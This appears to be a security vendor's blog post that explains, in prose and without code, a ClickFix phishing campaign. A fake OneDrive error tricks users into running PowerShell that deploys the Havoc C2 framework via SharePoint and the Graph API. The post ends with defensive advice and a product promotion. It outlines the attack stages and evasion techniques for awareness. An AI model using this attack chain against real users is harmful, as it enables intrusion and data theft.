Nexanet
<- Go Back

ClickFix Attack Deploys Havoc C2 via Microsoft SharePoint

Customer Avatar
Justine Garrett
Product Marketing Manager

A newly discovered ClickFix phishing campaign is being used by cybercriminals to trick victims into executing malicious PowerShell commands that deploy the Havoc post-exploitation framework for remote access. This attack leverages Microsoft SharePoint and Graph API to disguise malicious activity within trusted cloud services, making it difficult for security teams to detect the breach.

ClickFix, a social engineering tactic, creates fake error messages that prompt users to copy and paste a PowerShell command to fix a nonexistent issue. Instead, this command executes malware that grants attackers control over compromised systems, enabling them to steal data, move laterally, and deploy additional payloads.

Inside the ClickFix Attack: How It Works

Step 1: Phishing Email & Fake Error Message

Victims receive an HTML phishing email attachment labeled "Documents.html". When opened, the attachment displays a fake 0x8004de86 error, claiming that OneDrive failed to connect and requires a manual fix. A "How to Fix" button instructs users to copy a PowerShell command and execute it in their terminal.

Step 2: Execution of Malicious PowerShell Script

The PowerShell command downloads and runs a script hosted on a compromised Microsoft SharePoint site. The script checks if the device is in a sandboxed environment (to evade security tools). If no sandbox is detected, the script:

  • Modifies the Windows Registry to mark execution.
  • Installs Python (if not already present).
  • Fetches and runs another Python script from SharePoint.

Step 3: Deployment of Havoc C2 Framework

The Python script loads KaynLdr, a reflective DLL loader that launches Havoc Demon, a post-exploitation agent similar to Cobalt Strike. Havoc establishes remote control over the infected device, allowing threat actors to:

  • Execute commands and payloads.
  • Manipulate authentication tokens.
  • Perform Kerberos attacks for credential theft.
  • Exfiltrate sensitive data.

Step 4: Concealing Malicious Traffic via Microsoft Graph API

Attackers use the Microsoft Graph API to route Havoc C2 communication through legitimate Microsoft services. This technique makes it harder to detect malicious activity, as traffic appears to originate from trusted cloud applications rather than external servers.

The Growing Threat of ClickFix Attacks

ClickFix has quickly become a popular social engineering technique among cybercriminals, evolving beyond traditional email phishing. Recent developments include:

  • Wider malware distribution: ClickFix is now used to deploy infostealers, DarkGate, and remote access trojans (RATs).
  • Exploitation of social media: Threat actors have launched Telegram-based ClickFix scams using a fake identity verification service called "Safeguard" to trick users into running malicious PowerShell commands.

This evolution in phishing tactics highlights the increasing sophistication of cybercriminals, who are using trusted cloud platforms and social engineering to infiltrate corporate networks.

How to Protect Against ClickFix & Havoc C2 Attacks

  • Employee Awareness & Phishing Prevention: Educate employees about ClickFix scams, warn against copying & pasting commands from unknown sources, and enable email security solutions to block phishing emails containing malicious HTML attachments.
  • Endpoint Security & Threat Detection: Deploy AI-powered endpoint protection to detect and block suspicious PowerShell executions, monitor for unauthorized registry modifications, and use sandboxing tools to analyze potentially malicious scripts.
  • Secure Cloud & Microsoft Services: Restrict PowerShell execution policies to prevent unauthorized scripts from running, audit Microsoft SharePoint & Graph API usage to detect abnormal activity, and use Zero Trust security principles to limit access to cloud services with multi-factor authentication (MFA).

Final Thoughts: The Rising Danger of Social Engineering Attacks

The ClickFix phishing campaign demonstrates how attackers are weaponizing trust—leveraging Microsoft cloud services, PowerShell, and social engineering to execute highly effective cyberattacks. By disguising malware distribution within legitimate cloud infrastructure, they are making it significantly harder for traditional security measures to detect and block these threats.

As ClickFix continues to evolve and spread across different attack vectors, organizations must prioritize phishing awareness, endpoint security, and cloud security monitoring to defend against these emerging threats.

Protect Your Business with Nexanet

Cybercriminals are exploiting cloud services and social engineering to bypass security controls. Nexanet provides advanced email security, endpoint protection, and threat intelligence solutions to help businesses detect and block sophisticated phishing attacks.

Your Privacy, Our Priority

Learn what’s been shared without your consent.

Choose us to take a stand for your freedom and safeguard your right to privacy.